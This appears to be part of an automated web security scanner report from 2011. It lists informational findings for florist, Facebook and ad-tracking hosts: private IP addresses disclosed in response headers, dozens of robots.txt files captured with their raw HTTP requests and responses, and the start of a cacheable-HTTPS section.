User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.4.125
X-Cnection: close
Date: Mon, 09 May 2011 01:08:54 GMT
Elapsed: 0.062
Content-Length: 10927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.4. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ee3cf604%26origin%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Ff1da69ad5%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.21.128
X-Cnection: close
Date: Mon, 09 May 2011 01:10:47 GMT
Elapsed: 0.043
Content-Length: 9907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
21. Robots.txt file  previous  next
There are 34 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

21.1. http://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 09 May 2011 01:09:32 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
21.2. http://ads.undertone.com/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "3998221-1a-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Mon, 09 May 2011 01:09:03 GMT
Connection: close

User-agent: *
Disallow: /
21.3. http://adsfac.us/pct_mx.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "e5e89cdc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 00:59:32 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
21.4. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Wed, 11 May 2011 01:01:13 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
21.5. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 10 May 2011 01:18:23 GMT
Date: Mon, 09 May 2011 01:18:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
21.6. http://blooms.1800flowers.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blooms.1800flowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "24407c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=889
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
21.7. http://data.cmcore.com/cookie-id.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /cookie-id.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.cmcore.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:57 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "371f3c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=914
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
21.8. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dms.netmng.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 13 Apr 2010 14:06:56 GMT
Accept-Ranges: bytes
ETag: "7cd3a49312dbca1:1560"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 01:00:36 GMT
Connection: close

User-agent: *
Disallow: /
21.9. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1014041578/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1014041578/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 01:00:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
21.10. http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media1.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/runtime/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media1.1800flowers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 22 Apr 2011 17:45:24 GMT
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/plain
Content-Language: en-US
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:04:10 GMT
Content-Length: 127
Connection: close

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml
21.11. http://media4.1800flowers.com/800f_assets/jet/website/styles/baskets/martha-tab_sep.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media4.1800flowers.com
Path:   /800f_assets/jet/website/styles/baskets/martha-tab_sep.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media4.1800flowers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 25 Apr 2011 14:46:08 GMT
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/plain
Content-Language: en-US
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:17:34 GMT
Content-Length: 127
Connection: close

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml
21.12. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media5.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/carousel.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media5.1800flowers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 22 Apr 2011 17:45:24 GMT
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/plain
Content-Language: en-US
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:00:48 GMT
Content-Length: 127
Connection: close

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml
21.13. http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media6.1800flowers.com
Path:   /800f_assets/jet/website/images/baskets/runtime/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media6.1800flowers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 22 Apr 2011 17:45:24 GMT
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/plain
Content-Language: en-US
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:16:54 GMT
Content-Length: 127
Connection: close

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml
21.14. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:40 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "15d113-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www77
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
21.15. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...
21.16. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-0fxbD82AR3K-g.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 01:01:03 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 09 May 2011 01:01:03 GMT
Server: QS

User-agent: *
Disallow: /
21.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: products.proflowers.com

Response

HTTP/1.1 200 OK
Cache-Control: public,no-cache, no-store
Content-Type: text/plain
Expires: Tue, 10 May 2011 07:16:18 GMT
Last-Modified: Thu, 20 Jan 2011 23:51:56 GMT
Accept-Ranges: bytes
ETag: "1CBB8FD04FB3600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:59 GMT
Connection: close
Content-Length: 925

User-agent: *
Disallow: /-/
Disallow: /./
Disallow: /flowers/pickmeupbouquet-43065
Disallow: /BusinessServicesCorporate-BSV/
Disallow: /businessservicescorporate-bsv/
Disallow: /-day/
Disallow
...[SNIP]...
21.18. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1oYDINqGAyoFWsMAAAEyBVbDAAAP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1oYDINqGAyoFWsMAAAEyBVbDAAAP

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 01:29:51 GMT
Expires: Mon, 09 May 2011 01:29:51 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
21.19. http://safebrowsing.clients.google.com/safebrowsing/gethash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 01:06:05 GMT
Expires: Mon, 09 May 2011 01:06:05 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
21.20. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 01:09:08 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
21.21. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Mon, 09 May 2011 01:00:44 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
21.22. http://t.p.mybuys.com/webrec/wr.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.p.mybuys.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:39 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Mon, 14 Mar 2011 13:58:26 GMT
ETag: "17206bf-1c-49e71b4a44480"-gzip
Accept-Ranges: bytes
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

User-agent: *
Disallow: /
21.23. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 01:00:39 GMT
Expires: Mon, 09 May 2011 01:00:39 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
21.24. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.searchignite.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: track.searchignite.com

Response

HTTP/1.1 200 OK
Content-Length: 52
Content-Type: text/plain
Last-Modified: Thu, 31 Aug 2006 14:18:42 GMT
Accept-Ranges: bytes
ETag: "bbd5705c8cdc61:2c86"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 01:00:32 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /SI/CM/
21.25. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s82534269827883

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 12:08:31 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2d1153-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www34
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
21.26. http://ww30.1800baskets.com/include/cookieCloner.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /include/cookieCloner.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ww30.1800baskets.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:59 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Apr 2011 18:22:34 GMT
Content-Length: 127
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml
21.27. http://ww30.1800flowers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ww30.1800flowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:41 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Apr 2011 18:21:28 GMT
Content-Length: 127
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml
21.28. https://ww30.1800flowers.com/checkoutsignin.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ww30.1800flowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:15 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Apr 2011 18:21:28 GMT
Content-Length: 127
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml
21.29. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.137.41.101
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
21.30. http://www.ftd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=B550B8F479D710790018D87818E92C1C; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=B550B8F479D710790018D87818E92C1C; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:00:18 GMT
Vary: Accept-Encoding
Last-Modified: Mon, 24 Aug 2009 21:36:35 GMT
ETag: "1f-4a9307e3"
Content-Type: text/plain
Content-Length: 31
Date: Mon, 09 May 2011 01:00:19 GMT
X-Varnish: 1301368964
Age: 0
Via: 1.1 varnish
Connection: close

User-Agent:*
Disallow:/*?int=1
21.31. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 09 May 2011 01:00:52 GMT
Expires: Mon, 09 May 2011 01:00:52 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
21.32. http://www.googleadservices.com/pagead/conversion/1014041578/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1014041578/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 01:00:56 GMT
Expires: Mon, 09 May 2011 01:00:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
21.33. http://www.proflowers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.proflowers.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Tue, 10 May 2011 07:06:14 GMT
Last-Modified: Thu, 14 Apr 2011 18:15:56 GMT
Accept-Ranges: bytes
ETag: "1CBFACFFF625600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:26 GMT
Connection: close
Content-Length: 3518

User-agent: *
Disallow: /-/
Disallow: /./
Disallow: /about/
Disallow: /adtech/
Disallow: /affiliates.cfm
Disallow: /afj/
Disallow: /afterwork/
Disallow: /albertsons/
Disallow: /amex/
Disallo
...[SNIP]...
21.34. http://www.res-x.com/ws/r2/Resonance.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 55
Content-Type: text/plain
Last-Modified: Thu, 18 Jan 2007 19:00:12 GMT
Accept-Ranges: bytes
ETag: "08670e1323bc71:b77"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:27 GMT
Connection: close

# Disallow all web spiders
User-agent: *
Disallow: /
22. Cacheable HTTPS response  previous  next
There are 8 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

